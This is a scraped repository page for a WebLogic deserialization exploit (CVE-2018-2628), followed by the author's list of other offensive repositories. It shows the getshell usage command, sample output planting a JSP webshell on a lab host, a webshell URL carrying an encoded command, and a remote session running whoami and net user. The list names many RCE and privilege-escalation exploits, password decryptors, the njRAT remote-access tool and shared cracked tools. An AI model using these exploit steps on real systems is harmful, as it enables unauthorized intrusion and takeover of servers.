jas502n/CVE-2018-2628

Stars
101
Rank 338,166 (Top 7 %)
Language
Python
Created over 6 years ago
Updated over 1 year ago

jas502n/CVE-2018-2628

jas502n

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Weblogic 反序列化漏洞(CVE-2018-2628)

CVE-2018-2628 WebLogic反序列化漏洞复现

weblogic getshell

python CVE-2018-2628-Getshell.py ip port shell1.jsp

C:\Users\CTF\Desktop>python CVE-2018-2628-Getshell.py  10.10.20.166 7001 jason1.jsp

   _______      ________    ___   ___  __  ___      ___   __ ___   ___
  / ____\ \    / /  ____|  |__ \ / _ \/_ |/ _ \    |__ \ / /|__ \ / _ \
 | |     \ \  / /| |__ ______ ) | | | || | (_) |_____ ) / /_   ) | (_) |
 | |      \ \/ / |  __|______/ /| | | || |> _ <______/ / '_ \ / / > _ <
 | |____   \  /  | |____    / /_| |_| || | (_) |    / /| (_) / /_| (_) |
  \_____|   \/   |______|  |____|\___/ |_|\___/    |____\___/____|\___/


                          Weblogic Getshell
                                jas502n


handshake successful


 >>>>usage: python cve-2018-2628.py ip port shell1.jsp



>>>Shell File Upload Dir:

servers\AdminServer\tmp\_WL_internal\bea_wls_internal\9j4dqk\war\jason1.jsp


>>>Getshell: http://10.10.20.166:7001/bea_wls_internal/jason1.jsp?tom=d2hvYW1pCg==

C:\Users\CTF\Desktop>

python-poc

The Docker In Here! https://github.com/vulhub/vulhub/blob/master/weblogic/CVE-2018-2628/README.md

0x01 Nessus Scan

0x02 K8 Tools GetShell

0x03 CMD Query

Use-Method:

> python cve-2018-2628.py

set url :http://xx.xx.xx.xx:8001/bea_wls_internal/wlscmd.jsp
cmd >>: whoami

win-xxx8cb989qh\administrator

cmd >>: net user

\\WIN-XXX8CB989QH 的用户帐户

-------------------------------------------------------------------------------
Administrator            Guest
命令成功完成。

cmd >>:

0day-security-software-vulnerability-analysis-technology

0day安全_软件漏洞分析技术

IDA_Pro_7.2

oracleShell

oracle 数据库命令执行

Log4j2-CVE-2021-44228

Remote Code Injection In Log4j

CVE-2020-5902

CVE-2020-5902 BIG-IP

Grafana-CVE-2021-43798

Grafana Unauthorized arbitrary file reading vulnerability

St2-057

St2-057 Poc Example

CVE-2019-13272

Linux 4.10 < 5.1.17 PTRACE_TRACEME local root

CVE-2020-14882

CVE-2020–14882、CVE-2020–14883

CVE-2019-1388

CVE-2019-1388 UAC提权 (nt authority\system)

cve-2019-2618

Weblogic Upload Vuln(Need username password)-CVE-2019-2618

OA-tongda-RCE

Office Anywhere网络智能办公系统

CVE-2019-3396

Confluence 未授权 RCE (CVE-2019-3396) 漏洞

ncDecode

用友nc数据库密码解密

CVE-2018-17182

Linux 内核VMA-UAF 提权漏洞（CVE-2018-17182）,0day

gitlab-SSRF-redis-RCE

GitLab 11.4.7 SSRF配合redis远程执行代码

2018-QWB-CTF

2018强网杯CTF___题目整理

fuzz-wooyun-org

WooYun Fuzz 库

solr_rce

Apache Solr RCE via Velocity template

OA-Seeyou

CVE-2019-12409

Apache Solr RCE (ENABLE_REMOTE_JMX_OPTS="true")

CVE-2019-11580

CVE-2019-11580 Atlassian Crowd and Crowd Data Center RCE

CVE-2019-12384

Jackson Rce For CVE-2019-12384

SpringBoot_Actuator_RCE

SpringBoot_Actuator_RCE

CVE-2019-11043

php-fpm+Nginx RCE

CVE-2019-11581

Atlassian JIRA Template injection vulnerability RCE

kibana-RCE

kibana < 6.6.0 未授权远程代码命令执行 (Need Timelion And Canvas),CVE-2019-7609

CVE-2019-0193

Apache Solr DataImport Handler RCE

CVE-2020-8193

Citrix ADC Vulns

CVE-2019-19781

Citrix ADC Remote Code Execution

CVE-2020-2551

Weblogic RCE with IIOP

e-cology

e-cology OA_Beanshell_RCE

zentao-getshell

禅道8.2 - 9.2.1前台Getshell

CVE-2019-7238

Nexus Repository Manager 3 Remote Code Execution without authentication < 3.15.0

jackson-CVE-2020-8840

FasterXML/jackson-databind 远程代码执行漏洞

Redis-RCE

remote code execute for redis4 and redis5

FinalShellDecodePass

FinalShellDecodePass 加密解密

SHIRO-721

RememberMe Padding Oracle Vulnerability RCE

xxl-job

xxl-job RESTful API RCE

CVE-2019-0232

Apache Tomcat Remote Code Execution on Windows - CGI-BIN

CVE-2019-16278

Directory transversal to remote code execution

Ubuntu-0day

all 4.4 ubuntu aws instances are vulnerable

CVE-2018-3191

Weblogic-CVE-2018-3191远程代码命令执行漏洞

fastjson-RCE

fastjson-1.2.47

CVE-2019-2888

WebLogic EJBTaglibDescriptor XXE漏洞(CVE-2019-2888)

Shiro_Xray

CommonsBeanutils1,CommonsCollectionsK1

CVE-2019-15107

CVE-2019-15107 Webmin RCE (unauthorized)

St2-052

cve-2018-1273

Spring Data Commons RCE 远程命令执行漏洞

CVE-2019-11510-1

GitlabVer

gitlab version index

SHIRO-550

Shiro RememberMe 1.2.4 反序列化漏洞

webuploader-0.1.15-Demo

webuploader-v-0.1.15未授权-任意文件上传

BurpSuite_Pro_v1.7.37

CVE-2020-17008

CVE-2020-17008 splWOW64 Elevation of Privilege

DBconfigReader

泛微ecology OA系统接口存在数据库配置信息泄露漏洞

SqlMap_BurpSuite

SqlMap_BurpSuite

msfconsole-termux

How To Install Metasploit-Table on the Android Termux

CVE-2019-2890

CVE-2019-2890 WebLogic 反序列化RCE漏洞

cs_yara

check cs yara rules

st2-048

database-spring-ENC

sprint encode (plan text) get enc password

mssql-command-tool

mssql 终端连接工具|命令执行

BurpSuite-Plugin

Plugin For BurpSuite (Pentester)

fastjson-1.2.60-rce

autoType enable

Burp_AES_Plugin

Burpsuite Plugin For AES Crack

mimikat_ssp

Security Support Provider Interface

ThinkCMF_getshell

ThinkCMF 框架上的任意内容包含漏洞

CVE-2020-10199

CVE-2020-10199、CVE-2020-10204、CVE-2020-11444

ChromePluginCrx

离线安装Chrome插件-插件备份

JWT_Brute

CVE-2020-1947

Apache ShardingSphere UI YAML解析远程代码执行漏洞

CVE-2019-15642

Webmin Remote Code Execution (authenticated)

fastjson-1.2.61-RCE

fastjson-1.2.61-RCE

CVE-2019-8451

Jira未授权SSRF漏洞

fastjson-1.2.58-rce

fastjson-1.2.58-rce with h2 database

Fortify_Rule

Decode Fortify Rule Bin File Get XML File

CVE-2020-26259

CVE-2020-26259: XStream is vulnerable to an Arbitrary File Deletion on the local host when unmarshalling as long as the executing process has sufficient rights.

IDA7.0-Pro

some people share IDA7.0！

S2-045-EXP-POC-TOOLS

S2-045 漏洞 POC-TOOLS CVE-2017-5638

OpenFire_Decrypt

OpenFire 管理后台账号密码解密

njRAT-0.7

远控工具Njrat

CVE-2018-14847

MikroTik RouterOS Winbox未经身份验证的任意文件读/写漏洞

CVE-2019-20197

Nagios XI远程命令执行漏洞 <v5.6.9

CVE-2019-16759

vBulletin 5.x 未授权远程代码执行漏洞

st2-046-poc

st2-046-poc CVE-2017-5638

Jboss_JMXInvokerServlet_Deserialization_RCE

Jboss_JMXInvokerServlet_Deserialization_RCE

CVE-2019-10392

CVE-2019-10392 RCE Jackson with Git Client Plugin 2.8.2 (Authenticated)

CVE-2018-10933

libssh CVE-2018-10933

010-Editor-Template

Java-Compressed-file-security

java web 压缩文件安全漏洞

Vmware_vCenter

VMware vCenter(Unauthenticated)

PHPStudy-Backdoor

phpstudy dll backdoor for v2016 and v2018

CVE-2019-3394

Confluence（<install-directory>/confluence/WEB-INF/）文件读取漏洞

CTF-RSA-tool

Security_Article

scrapy website Article and link ...

Hscan

CVE-2018-2894

Weblogic,CVE-2018-2894

BurpSuite-icns

制作BurpSuite icns 在Mac OS上

phpweb

phpweb 前台任意文件上传